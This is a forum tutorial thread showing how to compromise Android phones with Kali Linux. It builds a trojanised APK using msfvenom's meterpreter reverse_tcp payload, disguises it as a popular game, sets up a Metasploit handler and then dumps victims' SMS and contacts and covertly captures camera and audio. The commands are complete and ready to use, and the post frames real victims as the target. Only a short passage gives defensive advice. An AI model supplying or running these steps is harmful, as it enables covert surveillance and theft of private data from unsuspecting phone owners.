What's new
  • Welcome to PHCorner Forums. Take a moment to Sign up and gain unlimited access and extra privileges that guests are not entitled to, such as: All that and more! Registration is quick, simple and absolutely free. Join our community today!

Tutorial How häçkers häçked android phones [Kali Linux]


Honorary Poster
Jan 28, 2017
, Last edited:
Good day! First of all, I'm not really sure if this is the correct thread where I can post this tutorial. It's been a while that I haven't posted any tutorials and now that I'm back, I hope that you guys will learn something. Before I start, I should ask you guys a question, "Do you really believe that our android phone is safe enough?". Well, normal users would believe that. However, from time to time, our technology is evolving and there are new security features in our android phones to avoid being häçked. Android applications comes with an APK file and most of us really love to install an APK file from somewhere else because there are a lot of applications that we want to download that is not available on Google Play Store. Well, this is the problem. We can allow our android phones to install an unknown sources of APK just by going to settings and ALLOW UNKNOWN SOURCES for us to be able to install the APK that we downloaded somewhere else. Now let's start.

- Kali Linux (you can download it from there You do not have permission to view the full content of this post. Log in or register now.)
- USB Flash Drive (if you don't wan to install Kali Linux OS, you can just use your Flash Drive and make it bootable. Kali Linux can be plugged and play :) ) note that this will format your flash drive and everything that is in your flash drive will be erased.
- Win32 Disk Imager (Yes! you need this if you want a bootable Kali Linux. Making it bootable is very simple as ABC song. You do not have permission to view the full content of this post. Log in or register now. and find the tutorial about Win32 Disk Imager)
- Social Engineering
- Brain.exe (We really need this one to make it work)

NOTE: USB Flash Drive should be more than 4GB

What do we need to know:
-PAYLOAD = it is the data that we sent over the internet. The headers and the actual data is being transmitted
-METERPRETER = this is the most advance extensible payload which uses in-memory DLL injection.
-REVERSE_TCP = is a staged payload used to gain meterpreter access to a compromised system.
-SOCIAL ENGINEERING = well, this is an ART OF DECEPTION. socialize to your victim and gain trust to your victim. :)


1. I assume that you already have the Kali Linux installed in your flash drive so since you are using a bootable flash drive, insert your USB flash drive first. Of course you need to override your BIOS and prioritize the USB flash drive so that once we reboot the computer, the computer will read the flash drive first instead of your HDD. If you don't know how to do that, you can use You do not have permission to view the full content of this post. Log in or register now..
2. If you already prioritized your flash drive, your computer should automatically boot into Kali Linux. It should look like this:
3. If you can see that GUI, that means you successfully prioritized your bootable flash drive. Now since you don't want to install the Kali Linux, just choose Live System and after that, it will load and will bring you to a log in panel. Just like Windows OS, it has a log in panel but the difference is that, you need to manually enter your user name and password. The default username of Kali Linux is root and the default password is toor.
4. Once you've logged in, you will see a beautiful Desktop :)
5. It should look like that. Now if you are using an Ethernet, Kali Linux should connect you to the internet automatically but if you are using a WiFi, then you should manually connect it.
6. Once you are connected to your internet, open up TERMINAL. YES! In Windows OS, it is called CMD. :)It should look like this:
Screenshot from 2019-09-30 00-07-23.png
7. In your terminal, type in: msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR-LOCAL-IP LPORT=YOUR-DESIRED-PORTS R > /root/NAME-OF-APKFILE.apk
NOTE: LHOST is your local IP Address. If you want to know your local IP, open another terminal and type in: ifconfig
It should look like this:

NOTE: I am using WiFI as my internet connection so I should look for WLAN. IN Kali, it is wlan0. My Local IP Address is "" after "inet".
Now in LPORT, just assign "4444" or what ever you want as long as it is a 4 digit number.

8. Now that we know the LHOST and LPORT, let's run a command that will allow us to create an APK file. type in: msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR-LOCAL-IP LPORT=YOUR-DESIRED-PORTS R > /root/NAME-OF-APKFILE.apk

NOTE: My local IP:
My PORT: 4444
yours will be different of course.

the command now should be like this in my machine: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /root/nba2k20.apk

I named my apk as
nba2k20 because there are a lot of people now that is looking for nba2k20. it's part of SOCIAL ENGINEERING of course.

9. After executing that command, it should look like this:
Screenshot from 2019-09-30 00-22-03.png
NOTE: ignore the first command that I run because the file location is invalid.
NOTE: ignore the errors. it is actually normal.

10. Now that we already created an apk, we will send the nba2k20.apk file to our victim. But in this tutorial, let's try it first in our own android phone. Let's copy the file that we created and paste in our phone.
11. Now install the APK that we created in our own phone. The APK name will be different once it's installed. it will become MainActivity as an application to our android phone.
12. Now in a real scenario, we should not send the file first to our victim. let's run the metasploit first to make it ready. to do that, open up another terminal and type in: msfconsole
it should look like this:
Screenshot from 2019-09-30 00-27-32.png
13. We are now in msfconsole. Let us start the listener by typing: use exploit/multi/handler
it should look like this now:
Screenshot from 2019-09-30 00-30-03.png
14. Now let's set the payload by typing: set payload android/meterpreter/reverse_tcp
it should look like this now:
Screenshot from 2019-09-30 00-32-08.png
NOTE: ignore the first command of setting up the payload. it's an invalid location.

15. Now let's set the LHOST by typing: set LHOST
16. After that, set the LPORT by typing: set LPORT 4444
17. then, type: exploit

it should look like this now:
this means that it is listening now and waiting for the APK that we just created to run. Now send it to the victim and let the victim install on it and wait for the victim to run or open the APK.
You might ask me if where you can find your APK that you just created, it is in the HOME directory.
Screenshot from 2019-09-30 00-39-25.png
it should look like this after the victim runs the APK:
NOTE: if you want to know the commands, just type: ? and hit enter

EXAMPLE: if you want to get the victim's TEXT MESSAGES, type in: dump_sms and hit enter

Screenshot from 2019-09-30 00-43-03.png
NOTE: the SMS that is captured as txt is in the HOME directory as well where you saved your generated APK.
EXAMPLE2: if you want to get the victim's contacts, type in: dump_contacts and hit enter

There are a lot of commands that you can try just like capturing a video or recording an audio or even capturing pictures if you really want it and the victim's will never ever notice it. Your victim doesn't need to open up their cameras for you to capture images or open camera to record videos or open an audio recorder to record an audio. you don't have to do that. and this is really terrific.

Now, what should we do to avoid being häçked? You should avoid installing or downloading an APK file to untrusted websites. Even if you have an anti-virus in your android phone, it will not be detected. it's really useless. You should also not allow UNKNOWN SOURCES which is by default is OFF. If you installed a suspicious file, uninstall it immediately. :)

NOTE: this attack works ONLY LOCALLY. which means, it will work if your victim is in the same network where you are connected. But is it possible to make the attack GLOBAL? of course it is. you just need to port forward your ports and use your public ip address as your LHOST. but this will be my next tutorial :)


no sir. hindi na gagana yon :) payload po kasi sya so it needs a human interaction and a CONNECTION between two devices which is the attacker and the victim.
okay thank you ts, very informative. natakot na tuloy ako sa mga apk files na nadownload ko noon


Forum Expert
may pwede bang pang detect ng apk if capable siya na maghäçk?

dito kasi sa Xiaomi Pocophone ko bago mag-install ng apk at kahit sa playstore iniiscan niya muna if safe ba yung app.

Online statistics

Members online
Guests online
Total visitors

Forum statistics